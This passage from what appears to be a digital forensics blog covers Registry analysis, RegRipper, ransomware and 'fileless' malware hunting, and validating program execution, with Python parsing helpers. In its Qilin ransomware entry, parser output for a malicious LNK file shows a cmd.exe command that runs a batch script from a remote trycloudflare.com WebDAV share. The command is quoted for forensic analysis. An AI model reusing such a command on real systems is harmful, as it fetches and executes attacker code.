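timeline = sorted(events, key=lambda line: int(line.split("|")[0]))
```

Because every data source is normalized into the same five fields, adding or removing a source is just adding or removing lines from the events file.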

In my current role, I don't have a need to determine things such as USB devices connected to a Windows system, but if I did, I'd definitely have Events Ripper plugins to extract that information, and maybe even correlate it, in an easy-to-view manner. 

This is just some of the content from my blog that explicitly addresses USB devices.

Friday, October 31, 2025

Registry Analysis

First off, what is "analysis"?

I submit that "analysis" is what happens when an examiner has investigative goals and context, and applies this, along with their knowledge and experience, to a data set. This can be anything, from a physical image of a mobile device, to a triage collection from an endpoint, to logs from a device, or various devices. 

IMHO, this distinction is valuable, because what we often call "analysis" is really nothing more than parsing. For example, someone may recommend (or state as part of their process) that we open a Registry hive in a viewer, and navigate to a particular path by clicking through the UI. Now, there are ways that this could be accomplished in a much more efficient manner (I didn't say "easier", because the command line isn't "easier" for some), but in the end, whether you're looking for one value or dumping all of the values from a user's Run key, it's still just parsing; there's no "analysis" unless the investigator can articulate how this action and their findings apply to their goals. 

Registry Analysis
That being said, again...what we most often think of, or refer to, as "Registry analysis" really amounts to nothing more than simple parsing. Few are actually conducting analysis of the files that comprise the Windows Registry, largely because knowledge of and experience with these files is often somewhat limited. For example...and you don't need to raise your hands...how many analysts are incorporating Registry hive file metadata into timelines? Or incorporating deleted keys and values into their overall analysis plan?
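As an example of the kind of hive file metadata I'm referring to, here's a hedged sketch of pulling fields from the "regf" base block at the start of every hive file. The offsets follow the publicly documented hive format; the sequence numbers are worth noting because a mismatch indicates transaction log data that has not yet been applied to the hive.

```python
import struct
from datetime import datetime, timedelta, timezone

def filetime_to_dt(ft):
    """Convert a 64-bit FILETIME (100ns ticks since 1601-01-01 UTC)."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_regf_header(buf):
    """Parse metadata fields from a Registry hive base block."""
    if buf[0:4] != b"regf":
        raise ValueError("not a Registry hive file")
    seq1, seq2 = struct.unpack_from("<II", buf, 4)      # primary/secondary sequence
    (ft,) = struct.unpack_from("<Q", buf, 12)           # last-written FILETIME
    major, minor = struct.unpack_from("<II", buf, 20)   # format version
    name = buf[48:112].decode("utf-16-le").split("\x00")[0]  # embedded hive name
    return {
        "seq1": seq1,
        "seq2": seq2,
        "dirty": seq1 != seq2,        # transaction logs not yet applied
        "last_written": filetime_to_dt(ft),
        "version": f"{major}.{minor}",
        "name": name,
    }
```

The last-written time stamp from the base block is exactly the sort of value that can be dropped straight into a timeline as an event.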

The Windows Registry includes a great deal of information related to the configuration of the endpoint, and for each user, contains information related to that user's activities. Not only does the Registry contain considerable metadata, but some of the values found within the Registry can contain valuable information regarding pre-existing states/conditions of the endpoint. For example, what we refer to as "shellbag" artifacts are composed of shell items, strung together in shell item ID lists. Some of these shell items themselves contain considerable metadata, such as time stamps from folders, preserved at the time the "shellbag" artifacts were created. 
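As a quick illustration of those preserved folder time stamps: many shell items store them in the 32-bit FAT/DOS date-time format (two 16-bit words, 2-second granularity, typically local time). A minimal decoder looks something like this:

```python
def decode_dosdate(dos_date, dos_time):
    """Decode the 16-bit FAT/DOS date and time words found in shell items.

    Note: 2-second granularity, and typically stored in local time.
    """
    year   = ((dos_date >> 9) & 0x7F) + 1980
    month  = (dos_date >> 5) & 0x0F
    day    = dos_date & 0x1F
    hour   = (dos_time >> 11) & 0x1F
    minute = (dos_time >> 5) & 0x3F
    second = (dos_time & 0x1F) * 2
    return (year, month, day, hour, minute, second)
```

This is why shellbag time stamps look "rounded" compared to NTFS FILETIMEs; the format simply can't represent odd seconds.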

Something else to consider is that very often, information stored in the Registry will persist beyond the point where applications and files are deleted/removed from the endpoint. 

Over the years, the Windows Registry has gone through changes, but the analysis process remains the same, in part, because the binary format of the Registry remains consistent. What we traditionally refer to as "Registry analysis" now extends beyond "the usual" hive files that make up the Windows Registry, to the AmCache.hve file, as well as similarly formatted files associated with AppX packages. Ogmini's recent blog post regarding Registry hives associated with AppX packages references/points to Mari's ZeroFox blog on the topic, as well as Chris's Cyber Triage contribution, in addition to discussing sources beyond the "traditional" Registry. 

As these files are of the same format, there's no reason to believe that what we learned about the traditional hive files...metadata, what constitutes a "deleted" key or value, etc...needs to change when it comes to these files, as well. We can parse them for keys and values, such as looking for the recently accessed documents in the AppX version of Notepad or WordPad, just as we can parse these files into a timeline.

Parting Thoughts
Limitations or shortcomings in the knowledge and experience of individual analysts can (and do) lead to analysis and intel "poverty", and these shortcomings have a cascading impact. To overcome them, we need to work together, in mentor/mentee relationships, to build better, more applicable processes that allow us to fill these gaps. Operationalizing "corporate" knowledge for the long term is the key to this, as knowledge is shared without the requirement for commensurate experience. 

Monday, October 27, 2025

Analyzing Ransomware

Not long ago, I ran across this LinkedIn post on analyzing a ransomware executable, which led to this HexaStrike post. The HexaStrike post covers analyzing an AI-generated ransomware variant, which (to be honest) is not something I'm normally interested in; however, in this case, the blog contained the following statement that caught my interest:

People often ask: “Why analyze ransomware? It’s destructive; by the time analysis happens, it’s too late”. That’s only half true. Analysis matters because sometimes samples exploit bugs to spread or escalate (think WannaCry/EternalBlue), they often ship persistence or exfiltration tricks that translate into detection rules, custom crypto occasionally ships with fixable flaws allowing recovering from ransomware, infrastructure and dev breadcrumbs surface through pathnames and URLs, and, being honest, it’s fun.

For anyone who's been following me for any length of time, here on this blog or on LinkedIn, you'll know that "dev breadcrumbs" are something that I'm very, VERY interested in. I tend to refer to them as "toolmarks" but "dev breadcrumbs" works just as well. 

Something else...in my experience, some of the malware RE write-ups are devoid of the types of things mentioned in the above quote, particularly anything that "translates into detection rules". I know some are going to think, "yeah, but like the quote also says, by the time we see this stuff executing, it's too late...", but that isn't always the case. For example, if you're able to write a detection rule that says, "...when we see an [un]signed process act as the parent for the following processes in quick succession, kill the parent process, log out the session owner, isolate the endpoint, and generate an alert...", then this sort of thing can be very valuable. 

Also, specific to ransomware, if there's a flaw in the encryption process found, then this may help with recovery where paying the ransom isn't required. For example, if the encryption process looks for a specific file or some other indicator, then that indicator can act as a "vaccine" of sorts; simply create it (say, an empty file) on the endpoint, and if the ransomware is launched against that endpoint, it will find the indicator (file), and based on the encryption logic, not encrypt files on the endpoint.
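The "vaccine" logic amounts to something like the following sketch; the marker path is entirely hypothetical, and the point is simply that the malware's own pre-flight check can be turned against it.

```python
from pathlib import Path

# Hypothetical indicator file; the real indicator would come from analysis
# of the specific ransomware sample's encryption logic.
MARKER = Path("C:/ProgramData/.infected")

def should_encrypt(marker=MARKER):
    """Mimics the malware's own check: refuse to run twice on one host."""
    return not marker.exists()

# Defensive use: pre-create the marker (even an empty file) on the endpoint,
# so the malware's own check returns False and files are never encrypted.
```

This only works when analysis has identified the indicator the sample looks for, which is exactly the sort of "fixable flaw" the HexaStrike quote is talking about.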

This is not a new idea, to be sure. Back in 2016, Kevin Strickland authored a blog post titled, "The Continuing Evolution of Samas Ransomware", showing how the ransomware executable changed over time, providing insight not just into the thought processes of the threat actors, and evolution of their tactics, but also detection opportunities.

Monday, September 01, 2025

Ransomware artifacts

I recently read through this FalconFeeds article on Qilin ransomware; being in DFIR consulting for as long as I have, and given how many ransomware incidents I've responded to or dug into, articles with titles like this attract my attention. I do not presume to know everything, and in fact, I'm very interested in the insights others provide based on their own investigations. 

As I read through the article, however, I became somewhat confused. Consider this quote from the article:

On closer examination, it is likely that the individual behind the Stack Overflow post was an infected victim rather than an attacker. This assessment is supported by the fact that another IP address 107[.]167[.]93[.]118 was observed with the same machine name (WIN-8OA3CCQAE4D) and identical configuration details. Such consistency across multiple, unrelated systems strongly indicates that the exploit automatically renames compromised hosts, leaving behind a uniform system identifier that inadvertently exposed itself in public forums. [emphasis added]

Okay, this statement is interesting. At work/day job, for example, we've observed this workstation name a number of times, with different IP addresses. Again, these have been observed at different times, so the thinking is that either a threat actor used different means to connect to the Internet, or the workstation with the NetBIOS name/machineID is a virtual machine shared by several individuals. I think what really threw me was the statement "...the exploit..."; while the word "exploit" is mentioned several times in the article, there's nothing that clearly delineates what that exploit is, nor how it was discovered or defined.

Later in the blog post, we see the section illustrated in Figure 1.

Figure 1: Blog excerpt

If I read the blog post correctly, the author's findings include the fact that the target victim is sent an LNK file by the threat actor; this is illustrated in Figure 2.

Figure 2: Blog excerpt

As anyone who's followed my work for any amount of time is aware, I'm very interested in LNK files, and not just from the perspective of parsing them, but more so, using the embedded metadata (or lack thereof, as the case may be) to develop threat intelligence. As JPCERT/CC pointed out a long time ago, there's a lot that an LNK file sent to a target can tell us about the developer's workstation, including the machine ID/NetBIOS name. So far, to my knowledge, the only folks to make full use of LNK metadata to develop threat intelligence are Mandiant, in their Nov 2018 write-up on APT29 (see fig. 5 & 6).

That being said, we know that many methods/APIs for creating LNK files automatically include the workstation name where the file is created in the LNK metadata. Since this affiliate is known (see Figure 2) to gain initial access to victim endpoints by sending a malicious LNK file, we know that the LNK file itself is not created on the target endpoint; as such, there is no reason to assume that there's an "exploit" that changes the name of impacted endpoint. 

While this is not something I've ever seen, nor heard of (again, I'll be the first to tell you that I don't know everything...), that doesn't mean it's impossible. It definitely could happen, but the evidence presented doesn't hold up in the face of artifact knowledge and experience.

Using information from the FalconFeeds article, I was able to locate and download a copy of the LNK file (MD5: 30fc1856c9e766a507015231a80879a8) and run it through my own LNK parser, which produced the following output:

guid               {00021401-0000-0000-c000-000000000046}
mtime              Fri Jan  3 15:02:21 2025 Z
atime              Fri Jan  3 15:02:21 2025 Z
ctime              Fri Jan  3 15:02:21 2025 Z
basepath           C:\Windows\System32\cmd.exe   
shitemidlist       My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
  C:2021-05-08 08:06:52  M:2025-02-05 09:50:22  A:2025-02-05 09:50:22 Windows  (9)  [530/1]
  C:2021-05-08 08:06:52  M:2025-01-28 21:48:18  A:2025-01-28 21:48:18 System32  (9)  [3286/1]
  C:2025-01-03 15:02:22  M:2025-01-03 15:02:22  A:2025-01-03 15:02:22 cmd.exe  (9)  
vol_sn             A409-2302                     
vol_type           Fixed Disk                    
commandline        /c "\\cayman-inter-descending-processed.trycloudflare.com@SSL\DavWWWRoot\kma.bat"
iconfilename       %SystemRoot%\System32\SHELL32.dll
hotkey             0x0                             
showcmd            0x7  
                           
***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|EnableTargetMetadata|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30     ParsingPath: C:\Users\Village Manor 2022\Desktop\osha3165 - Copy.pdf
{446d16b1-8dad-4870-a748-402ea43d788c}/104    VolumeID: {ad378747-1bfd-4172-b598-a876b80c03d9}
{b725f130-47ef-101a-a5f1-02608c9eebac}/10     ItemNameDisplay: osha3165 - Copy.pdf
{b725f130-47ef-101a-a5f1-02608c9eebac}/12     Size: 16040764
{b725f130-47ef-101a-a5f1-02608c9eebac}/14     DateModified: Tue Jul 17 20:17:44 2012 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/15     DateCreated : Thu Feb  6 07:34:38 2025 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/4      ItemType: Microsoft Edge PDF Document
{e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6      ItemFolderPathDisplay: C:\Use

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : win-8oa3ccqae4d 
New Droid ID Time     : Fri Jan 31 14:29:24 2025 UTC
New Droid ID Seq Num  : 5988
New Droid    Node ID  : e0:09:88:3d:81:23
Birth Droid ID Time   : Fri Jan 31 14:29:24 2025 UTC
Birth Droid ID Seq Num: 5988
Birth Droid Node ID   : e0:09:88:3d:81:23

From the above output, and looking back to the Mandiant article, we can see a great deal about the developer's endpoint, including the workstation name "win-8oa3ccqae4d". We can also see a great deal of information that can likely be applied to the campaign, and by extension, be used to flesh out and provide context to both intrusion and threat intelligence.
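As a side note, the "droid" entries in the TrackerDataBlock are version-1 UUIDs, so once you have the raw GUID, the Python standard library can pull out the node (MAC address) and time stamp fields directly; no special parsing code is required. The function below is a sketch, and any UUID you feed it for testing is hypothetical.

```python
import uuid
from datetime import datetime, timedelta, timezone

def droid_details(droid):
    """Extract the node (MAC address) and creation time from a version-1 UUID."""
    u = uuid.UUID(droid)
    if u.version != 1:
        raise ValueError("not a version-1 UUID")
    # Version-1 time stamps count 100ns ticks from 1582-10-15 (Gregorian epoch)
    created = datetime(1582, 10, 15, tzinfo=timezone.utc) + timedelta(
        microseconds=u.time // 10)
    mac = ":".join(f"{(u.node >> s) & 0xFF:02x}" for s in range(40, -1, -8))
    return mac, created
```

This is exactly where the "e0:09:88:3d:81:23" node ID and the droid time stamps in the output above come from.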

However, it seems clear that the author of the FalconFeeds article is missing some knowledge of Windows artifacts and file structures. Running an LNK file through ANY.RUN is one method to use, but it should not be the only method used to develop information from that artifact. This also supports my thought that CTI teams would benefit from deep digital analysis skill sets, to develop and interpret artifacts from various systems and endpoints in a more thorough, correct manner. 

Thursday, July 03, 2025

RegRipper

The awesome folks over at Cyber Triage recently published their 2025 Guide to Registry Forensic Tools, and being somewhat interested in the Windows Registry, I was very interested to take a look. The article is very well-written, and provides an excellent basis for folks who are new to DF/IR work, and new to the Windows Registry.

Within the blog post, there's a table in the Registry Forensic Tools section (see the image to the right). In the image, we see that one of the metrics or indicators associated with the tools listed are whether or not the tool "handles transaction logs", with just a statement to that effect. 

If someone is new to including the Windows Registry as part of their analysis process, and doesn't understand the purpose of the transaction logs, nor how they work, they'd likely look at this table and think, "Well, I'm not using RegRipper! Handling the transaction logs is important to Chris Ray, and while I don't know why, I'm going to go along with what Chris recommends!"

The statement, "Does not handle transaction logs" doesn't tell the whole story, as I purposely wrote RegRipper to not handle the transaction logs. From my perspective, incorporating transaction logs into your analysis needs to be a purposeful, intentional decision. Incorporating transaction logs certainly has its place in any analysis process for Windows systems, but it should not happen automagically, without the analyst's/examiner's knowledge. And it should not just happen every time. Further, why should I write code for processing transaction logs when there are already a number of other tools that allow you to do so? Why re-write this capability? 

You know, this kind of thing has happened before. In 2012, at a pretty big DF/IR security conference, a Google engineer was presenting on an enterprise-wide response capability, and included a slide that said, "RegRipper does not scale to the enterprise." I was in the front row, because...you know...DF/IR, and was a little taken aback by this statement. This was like stating that the F-150 truck, the most popular model of light pickup, does not transition to airplane mode. No, because it was never intended to, and it wasn't designed that way. So, rather than reaching out and engaging the author of the tool, and asking, "hey, what do you think about making this an enterprise tool?", the presenter simply made their statement, and left it at that.

Now, why did I want handling the transaction logs to be a purposeful, intentional decision? If you've ever processed the transaction logs, you'll notice that when you apply them to a Registry hive, the hive file itself remains the same size; keys and values are updated or added, but the file does not grow, even though the hash changes. This means that unallocated space within the resulting hive file is overwritten...deleted keys and values, and possibly even slack space, are overwritten.

Why does this matter? Well, consider the recent write-up on the DEVMAN ransomware variant (from ANY.RUN). The image to the left discusses file lock evasion (the inclusion of "persistence" in the heading is a bit misleading), and states, "Each of these entries is quickly deleted after being written...", which means these entries become part of unallocated space. Now, this may not be important to you, based on your investigative goals...or it may be very important.

So, to be clear, if you're at all interested in data deleted from the Registry, and you understand that Registry hive files themselves contain unallocated space, and that values can contain slack space, you might not want to just automatically apply transaction logs. Depending upon the timing of the incident and your investigative goals, you may want to first fully parse the hive file, before applying the transaction logs and applying the same parsing process a second time. Sort of a "before" and "after" snapshot of the hive.
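The "before" and "after" approach can be sketched as a simple diff; the parse output here is simplified to a map of key paths to value names, and applying the transaction logs in between the two parsing passes is left to whichever tool you already use for that.

```python
def diff_hives(before, after):
    """Diff two parsing passes over the same hive.

    before/after: dict of key_path -> set of value names, from parsing the
    hive before and after transaction log replay, respectively.
    """
    removed = {k: v for k, v in before.items() if v - after.get(k, set())}
    added   = {k: v for k, v in after.items() if v - before.get(k, set())}
    return {
        # values visible pre-replay but gone afterward (potentially deleted data)
        "values_removed": {k: v - after.get(k, set()) for k, v in removed.items()},
        # values that only appear once the logs are applied
        "values_added":   {k: v - before.get(k, set()) for k, v in added.items()},
    }
```

Anything in "values_removed" is exactly the sort of data that would have been silently lost had the logs been applied automatically, before the first parsing pass.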

Neither RegRipper v3.0 nor RegRipper v4.0 processes the transaction logs; however, both are open source, and you can write your own plugins, or modify current plugins in any way you choose, such as changing the output format. For example, both versions include multiple plugins that output in 5-field TLN format (for inclusion directly into a timeline events file), and v4.0 has several plugins that output in JSON format. I get it, though...the TLN output is meaningless if you're not creating timelines.

Also, with RegRipper v4.0, I got Yara working within RegRipper, meaning that you can run Yara rules against Registry values, right from RegRipper.

Finally, both versions include plugins to do various parsing, such as parsing unallocated space, parsing Registry value sizes, locating EXE/PE files in Registry values, etc.

Monday, June 30, 2025

Hunting Fileless Malware

I ran across Manuel Arrieta's Hunting Fileless Malware in the Windows Registry article recently, and found it to be an interesting read.

Let me start by saying that the term "fileless malware", for me, is like fingernails dragged down a chalkboard. Part of this is due to the DarkWatchman write-up, where the authors stated that some parts of the malware were "...written to the Registry to avoid writing to disk." That kind of distinction has always rubbed me the wrong way. However, regardless of what we call it, I do "get" the concept behind the turn of phrase, and why folks tend to feel that this sort of thing is more difficult to detect than malware that actually writes a file to disk. I'm not sure why they feel that way...maybe it's because the code that downloads the malware and injects it directly into memory (in some cases) can reside anywhere on the system, within any Registry value. However, the key is that this somehow needs to remain persistent, which limits the number of locations for the code that initiates the download, accesses the shellcode, or performs whichever initiating function. 

In his article, Manuel discusses the use of LOLBins to write information to the Registry, and how this can be used for detection. He references several LOLBins, and something we have to keep in mind is that there's often more to these detections than just what we see on the surface. For example, is PowerShell used extensively within your infrastructure to create Registry values? If not, then just the use of PowerShell in that manner would make for a good hunt, or even a good detection opportunity. The same is true for other LOLBins, including reg.exe, rundll32.exe, etc. If these are not something that you usually 'see' within your infrastructure, then those instances that you do see would need to be investigated.

Manuel's article discusses a number of interesting approaches for creating detections for "fileless" malware that's written to the Registry, and anyone involved with detection engineering should strongly consider giving it a good, solid read, and seeing how it can be applied to their environment. 

I'd like to take the opportunity to add to Manuel's work by presenting means for detecting this type of malware from a triage or "dead box" perspective. For example, Manuel mentions looking for LOLBins writing Registry values of suspicious lengths. I like this approach, because I'd taken a similar approach in 2015 when I originally wrote the RegRipper sizes.pl plugin. This plugin walks through a Registry hive and looks for all values over a specific $min_size, which is set to 5000 bytes (you can easily change this by opening the plugin in Notepad and changing the size value). Now, you're going to have legitimate Registry values that contain a lot of data, and that's to be expected; it's normal. However, a way to extend this is to look to publicly available threat intel based on actual incident data, see what different threat actors are placing in Registry values, and tailor your approach. 
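For illustration, here's a rough Python analog of the sizes.pl idea; this is a sketch, not the plugin itself, but the 5000-byte threshold mirrors the plugin's default.

```python
MIN_SIZE = 5000  # mirrors the sizes.pl default; tune it per your environment

def flag_large_values(values, min_size=MIN_SIZE):
    """Flag Registry values carrying suspiciously large data.

    values: iterable of (key_path, value_name, data_bytes) tuples, as produced
    by whatever hive parser you use.
    """
    return [(key, name, len(data))
            for key, name, data in values
            if len(data) > min_size]
```

As noted above, legitimate values with large data are normal; the output of a check like this is a hunting lead, not a verdict.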

Almost 2 yrs ago, I announced that I'd found a way to integrate Yara into RegRipper v4.0, so any Yara rule that looks for indications of "fileless" malware or shellcode within a file can be run against Registry values, through RegRipper. This can include rules that look for base64-encoded strings, or that begin with some variation of "powershell" (i.e., mixed-case, carets between the letters, etc.).
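Even without Yara, the same idea can be sketched in plain Python; the regex below is a hypothetical example that catches "powershell" written with mixed case and/or carets between the letters, as seen in obfuscated command lines.

```python
import re

# Mixed case handled by (?i); \^* allows zero or more carets between letters,
# catching variants like "p^o^w^e^r^s^h^e^l^l" and "PoWeRsHeLl".
OBFUSCATED_PS = re.compile(r"(?i)p\^*o\^*w\^*e\^*r\^*s\^*h\^*e\^*l\^*l")

def looks_like_powershell(data):
    """Return True if the string contains an obfuscated 'powershell' token."""
    return bool(OBFUSCATED_PS.search(data))
```

A check like this can be run against the data from every value in a hive, in the same pass as the size check described above.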

The findexes.pl plugin, which looks for strings beginning with "MZ" in Registry values, was originally written in 2009, based on an engagement Don Weber worked while he was a member of the IBM ISS X-Force ERS team. Don found that, during the engagement, the threat actor had written a PE file to a Registry value, and then, rather than reaching out to a network resource to download the malware, simply extracted it from the Registry value. I found this very interesting at the time, because several years prior, while working on network exploitation research for the military, I'd theorized something similar happening, and actually created a working demo. Jump forward several years, and Don was showing me that this was actually being used in the wild. The findexes.pl plugin is one approach, and using Yara rules is another.

Examples
Here's an example of a persistence mechanism in the Registry pointing to a value that contains a base64-encoded string.

Here's an example from Splunk; scroll down to the section called "Fileless Execution Through Registry". This one creates a Run key value containing JavaScript code to run calc.exe, so it's clearly not "fileless", per se, but it does serve as a harmless example you can use to test dead-box detections.

Here are some practical examples from Securonix; unfortunately, some of the examples are in screen captures, so you can't get specifics about them, such as the length of the value data, but you can use these examples to round out your detections.

Thursday, June 26, 2025

Program Execution, follow-up pt II

On the heels of my previous post on this topic, it occurred to me that this tendency to incorrectly refer to ShimCache and AmCache artifacts as "evidence of execution" strongly indicates that we're also not validating program execution. That is to say, when we "see" a program execution event, or something that indicates that a program may have executed, are we validating that it was successful? Are we looking to determine if it completed its intended task, or are we simply assuming that it did?

For example, let's say we have an alert based on a threat actor running a net user command to add a new user account to an endpoint; when I see this command, I want to check the Security Event Log to see if there are any Security-Auditing/4720 records at about the same time, to indicate that the command succeeded. The command will very likely be accompanied by other Security Event Log records related to the account being enabled, the password being reset, etc; however, the ../4720 event record is what primarily interests me, because sometimes, you'll see the net user command that does not include the /add or /ad switch, but is still reported as a "new user being created", when, in fact, the account already exists and the password is being changed.
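That validation step can be sketched as a simple correlation; the event records here are simplified to (time stamp, event ID) pairs, and the 60-second window is an assumption you'd tune to your environment.

```python
from datetime import timedelta

def validate_account_creation(cmd_time, security_events, window_secs=60):
    """Return Security-Auditing/4720 (account created) records near cmd_time.

    cmd_time: datetime of the observed 'net user ... /add' execution.
    security_events: iterable of (timestamp, event_id) tuples from the
    Security Event Log.
    """
    window = timedelta(seconds=window_secs)
    return [e for e in security_events
            if e[1] == 4720 and abs(e[0] - cmd_time) <= window]
```

An empty result doesn't prove the command failed, but it does mean the "new user created" finding hasn't been validated, and needs a closer look.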

Regardless of what's reported, the point here is, are we validating what we're seeing? Another example is the use of msiexec.exe; when we see a command using this LOLBin run, do we also see accompanying MsiInstaller records in the Application Event Log? I've seen reports of msiexec.exe being run against HTTP resources, stating that something was installed; however, there are no corresponding MsiInstaller records in the Application Event Log.

Another use of the Application Event Log, when validating program execution, comes when you timeline the log records alongside EDR telemetry or process launch (Sysmon, Security-Auditing/4688) records. For example, if you see Application Pop-up or Windows Error Reporting messages for the program around the same time as the program execution, this would indicate that the program did not successfully launch. 

Another similarly valuable resource is AV logs. You may see the program execution attempt, followed by an AV message indicating that the process was detected and quarantined. Or, as has occurred several times, Windows Defender may generate a detection record, and rather than a successful quarantine message, the detection is followed by a critical failure message, and the malware continues to execute.

The great folks over at Cyber Triage posted this guide on Malware WMI Event Consumers; pg 6 illustrates the "Classic Detection" techniques. Looking at these, EDR/Sysmon, and the WMI-Activity/Operational Event Log can be incorporated into a timeline to not only illustrate program execution, but that the execution succeeded and resulted in the intended (by the threat actor) outcome. For example, if you incorporate EDR into a timeline that includes the Windows Event Logs, then you'd likely look for WMI-Activity/5861 event records to see if a new event consumer had been successfully created. 

From there, the next step would be to parse the Objects.DATA file to determine if the event consumer is still visible in the WMI repository. 

Summary
Continuing to see artifacts such as ShimCache and AmCache referred to in the community as "evidence of execution" really shows me that, overall, we're too focused on finding the one thing that illustrates that something happened. While it's important to have a correct, accurate understanding of the nature of various individual artifacts, as a community we need to start processing this understanding within a system framework, understanding that each data source plays an important role within the system as a whole. Nothing happens in isolation; whenever something happens on a live system, impressions and toolmarks are going to be left in a variety of data sources. Some may be extremely transient, existing in memory for only a very short time, while others may be written to logs or to the Registry, and persist well beyond the removal of the "offending" application. 

But, I get it. It's easy to simply state that something happened, and hope that no one questions your statement. It's much harder to make a statement supported by data, because doing so isn't something we're familiar with; it's not something we've been doing for years at this point. It's not part of our process, nor is it part of our culture. But remember...everything is difficult the first time we do it, and sometimes even after. Climbing a rope in gym class was hard, until you first did it. It may even have been hard the second or third time, but eventually you realized you could do it. 

Validation of your findings is important because, when you complete the ticket or the report you're writing and send it off to your "customer", someone may be making a decision and allocating resources based on those findings. My previous blog post provides one example of how I've experienced the need to validate findings during my time in the industry. Whether you see it right now or not, at some point someone's very likely going to take your findings and make a decision based on what you've provided, and you want to be as sure as you can that those findings are correct, and supported by the data.